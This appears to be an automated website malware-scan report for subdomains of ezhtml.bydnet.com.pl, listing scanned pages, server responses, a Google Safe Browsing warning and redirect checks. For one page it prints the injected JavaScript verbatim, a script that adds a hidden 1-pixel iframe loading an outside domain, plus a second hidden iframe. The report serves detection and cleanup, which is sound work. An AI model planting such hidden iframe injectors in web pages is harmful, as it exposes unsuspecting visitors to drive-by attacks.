Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ezhtml.bydnet.com.pl
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ezhtml.bydnet.com.pl/ | 200 OK Content-Length: 1398 Content-Type: text/html | clean |
http://ezhtml.bydnet.com.pl/autorafmar/ | 200 OK Content-Length: 2774 Content-Type: text/html | clean |
http://ezhtml.bydnet.com.pl/autorafmar/AC_RunActiveContent.js | 200 OK Content-Length: 8029 Content-Type: application/javascript | clean |
http://ezhtml.bydnet.com.pl/test404page.js | 404 Not Found Content-Length: 185 Content-Type: text/html | clean |
http://ezhtml.bydnet.com.pl/bktaekwondo/ | 200 OK Content-Length: 490 Content-Type: text/html | clean |
http://ezhtml.bydnet.com.pl/bktaekwondo/function.require-once | 404 Not Found Content-Length: 204 Content-Type: text/html | clean |
http://ezhtml.bydnet.com.pl/bktaekwondo/function.require | 404 Not Found Content-Length: 199 Content-Type: text/html | clean |
http://ezhtml.bydnet.com.pl/bplan/ | 403 Forbidden Content-Length: 171 Content-Type: text/html | clean |
http://ezhtml.bydnet.com.pl/djantarski/ | 403 Forbidden Content-Length: 171 Content-Type: text/html | clean |
http://ezhtml.bydnet.com.pl/drogerianina/ | 200 OK Content-Length: 3936 Content-Type: text/html | clean |
http://ezhtml.bydnet.com.pl/erzet/ | 200 OK Content-Length: 3669 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
var url="http://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}
Antivirus reports:
Hidden iFrame found. size: 10x10 style: hidden src: http://bydnet.home.pl/counter.php
<iframe src="http://bydnet.home.pl/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>
http://ezhtml.bydnet.com.pl/erzet/AC_RunActiveContent.js | 200 OK Content-Length: 8029 Content-Type: application/javascript | clean |
http://ezhtml.bydnet.com.pl/mattsound/ | 200 OK Content-Length: 12957 Content-Type: text/html | clean |
http://ezhtml.bydnet.com.pl/mattsound/media/system/js/mootools-core.js | 200 OK Content-Length: 96362 Content-Type: application/javascript | clean |
http://ezhtml.bydnet.com.pl/mattsound/media/system/js/core.js | 200 OK Content-Length: 4784 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ezhtml.bydnet.com.pl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Dec 2014 12:40:31 GMT
Server: IdeaWebServer/v0.80
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: ezhtml.bydnet.com.pl
Referer: http://www.google.com/search?q=ezhtml.bydnet.com.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.